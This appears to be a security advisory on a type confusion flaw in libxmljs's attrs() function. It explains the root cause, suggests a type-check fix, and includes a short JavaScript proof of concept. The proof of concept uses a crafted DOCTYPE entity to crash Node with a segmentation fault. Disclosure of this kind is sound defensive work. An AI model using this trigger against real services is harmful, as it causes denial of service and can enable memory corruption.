libxmljs attrs type confusion RCE

An attacker can trigger this vulnerability by providing a specially crafted XML document that includes a DOCTYPE with an entity reference. When the `attrs()` function is invoked on a grand-child node that refers to this entity, a type confusion occurs. This can lead to denial of service, data leaks, infinite loops, and remote code execution, particularly on 32-bit systems when the `XML_PARSE_HUGE` flag is enabled [ref_id=1].

The vulnerability lies within the SWIG-generated function `_wrap__xmlNode_properties_get()` in `libxml2.cc`. This function incorrectly casts `info.Holder()` to an `_xmlNode` pointer when it might actually be an `_xmlEntity`. The subsequent call to `_xmlNode_properties_get()` then accesses the `properties` member, which is at the same offset as the `length` member in `_xmlEntity`, leading to the type confusion [ref_id=1].

The advisory suggests that the `_wrap__xmlNode_properties_get()` function should include a check to verify that the `arg10` variable is indeed an `xmlNode` before proceeding. This would prevent the function from misinterpreting an `xmlEntity` as an `xmlNode`, thereby mitigating the type confusion that leads to the vulnerability.

```javascript const libxmljs = require('libxmljs');

var d = `<?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE note [ <!ENTITY writer "JFrog Security"> ]> <from>&writer;</from> `;

t = libxmljs.parseXml(d) from = t.get('//from') c = from.childNodes()[0] console.log("c.name = ", c.name()); //prints "c.name = entity_ref" c2 = c.childNodes()[0] //writer console.log("c2.name = ", c2.name()); //prints c2.name = entity_decl" c2_attrs = c2.attrs() //segmentation fault happens here console.log(c2_attrs[0].name()) ``` Run the script: `$ node DoS.js` Segmentation fault